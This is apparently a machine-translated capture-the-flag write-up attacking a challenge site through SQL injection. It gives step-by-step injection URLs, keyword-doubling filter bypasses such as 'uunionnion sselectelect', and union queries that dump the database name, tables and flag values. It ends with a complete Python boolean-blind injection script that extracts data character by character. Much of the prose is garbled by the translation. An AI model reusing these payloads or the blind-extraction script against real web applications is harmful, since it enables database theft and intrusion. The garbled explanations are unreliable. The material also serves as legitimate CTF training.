This article is SQL injection step manual + idea, and blinds script.
http://123.206.87.240:9004/1ndex.php?id=1
http://123.206.87.240:9004/1ndex.php?id=1 ' error
http://123.206.87.240:9004/1ndex.php?id=1'--+ normally present injection
http://123.206.87.240:9004/1ndex.php?id=1 'and 1 = 1 - + error and was filtered,
http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘
Use filter length is determined to be filtered or union select stars
http://123.206.87.240:9004/1ndex.php?id=1 'oorrder by 2 - + normal write bypass bis
http://123.206.87.240:9004/1ndex.php?id=1 'oorrder by 3 - + given the presence of two libraries
http://123.206.87.240:9004/1ndex.php?id=1 'aandnd 1 = 2 uunionnion sselectelect 1,2 - + normal echo No. 2
To be injected into the number two position
http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+
Database name web1002-1
http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+
Table flag1, hint
123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+
Field flag1, address
http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+
flag1 content: usOwycTju + FTUUzXosjr populated found not entitled to say there are two flag lowercase
http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+
address content to the next level, click on the address to the next level: http://123.206.87.240:9004/Once_More.php?id=1
http://123.206.87.240:9004/Once_More.php?id=1 ' error
http://123.206.87.240:9004/Once_More.php?id=1 '- + normally present injection
http://123.206.87.240:9004/Once_More.php?id=1 'order by 2 - + Normal
http://123.206.87.240:9004/Once_More.php?id=1 'order by 3 - + given the presence of two libraries
http://123.206.87.240:9004/Once_More.php?id=1 '^ (length (' union ')! = 0) ^' normal union is filtered
http://123.206.87.240:9004/Once_More.php?id=1 'and 1 = 2 uunionnion select 1,2 - + bis write can not be bypassed
http://123.206.87.240:9004/Once_More.php?id=1 'and 1 = 2 Union select 1,2 - + case can not be bypassed
http://123.206.87.240:9004/Once_More.php?id=1 '^ (length (' sleep ')! = 0) ^' normal sleep is also filtered by the filter substr
Since the return to correct an error trying to write a different script Bool blind
import sys import requests from bs4 import BeautifulSoup import re url_start = 'http://123.206.87.240:9004/Once_More.php?' sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"
sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+" sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+" sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+" def Brup(SQL): name='' for i in range(1,40): for ch in range(32,129): if ch == 128: sys.exit(0) payload = SQL.format(i,chr(ch)) url_all = url_start+payload #print(url_all) html = requests.get(url_all) soup = BeautifulSoup(html.content, 'html.parser') result = soup.find_all(text = 'Hello,I Am Here!') #判断列表是否为空 if len(result): name += chr(ch) print('name:'+name) break if __name__ == '__main__': #Brup(sqldb) #Brup(sqltb) #Brup(sqltest) Brup(sqlflag) #tablename:class,flag2 #Note: running out for the capital, flag all lowercase.
usOwycTju + FTUUzXosjr
web1002-1